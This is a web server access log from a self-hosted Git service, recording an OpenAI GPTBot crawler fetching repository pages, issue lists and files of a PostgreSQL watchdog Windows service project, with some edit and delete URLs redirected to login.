git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_error.log?display=source" [Client 74.7.227.38] [Length 15028] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:18:29:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_error.log?display=source" [Client 74.7.227.38] [Length 25352] [Gzip 11.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:18:29:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_access.log?display=source" [Client 74.7.227.38] [Length 48519] [Gzip 12.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:18:29:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11365] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:18:29:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" [Client 74.7.227.38] [Length 11307] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" +[17/Feb/2026:18:29:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=closed&type=all" +[17/Feb/2026:18:29:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 12920] [Gzip 4.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:18:29:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&state=closed&type=all" +[17/Feb/2026:18:29:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:29:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:29:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:29:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=farduedate&state=closed&type=all" +[17/Feb/2026:18:29:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=oldest&state=closed&type=all" +[17/Feb/2026:18:29:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:29:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&state=open&type=all" +[17/Feb/2026:18:29:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" +[17/Feb/2026:18:29:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" +[17/Feb/2026:18:29:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" +[17/Feb/2026:18:29:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" +[17/Feb/2026:18:29:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:18:29:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:18:29:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:18:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:18:29:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" +[17/Feb/2026:18:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" +[17/Feb/2026:18:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" [Client 74.7.227.38] [Length 17336] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" +[17/Feb/2026:18:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" [Client 74.7.227.38] [Length 13603] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" +[17/Feb/2026:18:29:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" [Client 74.7.227.38] [Length 13339] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" +[17/Feb/2026:18:29:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" [Client 74.7.227.38] [Length 11475] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" +[17/Feb/2026:18:29:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" [Client 74.7.227.38] [Length 14801] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" +[17/Feb/2026:18:29:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" [Client 74.7.227.38] [Length 15351] [Gzip 4.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" +[17/Feb/2026:18:29:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" [Client 74.7.227.38] [Length 12450] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" +[17/Feb/2026:18:29:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" [Client 74.7.227.38] [Length 13488] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" +[17/Feb/2026:18:29:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" [Client 74.7.227.38] [Length 13489] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" +[17/Feb/2026:18:29:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:29:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:29:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" [Client 74.7.227.38] [Length 1073] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" +[17/Feb/2026:18:29:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" [Client 74.7.227.38] [Length 9780] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" +[17/Feb/2026:18:29:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" +[17/Feb/2026:18:29:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" +[17/Feb/2026:18:29:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" [Client 74.7.227.38] [Length 2394] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" +[17/Feb/2026:18:29:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" [Client 74.7.227.38] [Length 1081] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" +[17/Feb/2026:18:29:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" [Client 74.7.227.38] [Length 15471] [Gzip 7.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" +[17/Feb/2026:18:29:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" [Client 74.7.227.38] [Length 9944] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" +[17/Feb/2026:18:29:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" [Client 74.7.227.38] [Length 9946] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" +[17/Feb/2026:18:29:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" [Client 74.7.227.38] [Length 13454] [Gzip 6.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" +[17/Feb/2026:18:29:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" [Client 74.7.227.38] [Length 12014] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" +[17/Feb/2026:18:29:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" [Client 74.7.227.38] [Length 2595] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" +[17/Feb/2026:18:29:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" [Client 74.7.227.38] [Length 12909] [Gzip 6.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" +[17/Feb/2026:18:29:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" [Client 74.7.227.38] [Length 1081] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" +[17/Feb/2026:18:29:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" [Client 74.7.227.38] [Length 9952] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" +[17/Feb/2026:18:29:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" [Client 74.7.227.38] [Length 15137] [Gzip 8.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" +[17/Feb/2026:18:29:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" [Client 74.7.227.38] [Length 15878] [Gzip 9.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" +[17/Feb/2026:18:29:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" [Client 74.7.227.38] [Length 9951] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" +[17/Feb/2026:18:29:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr 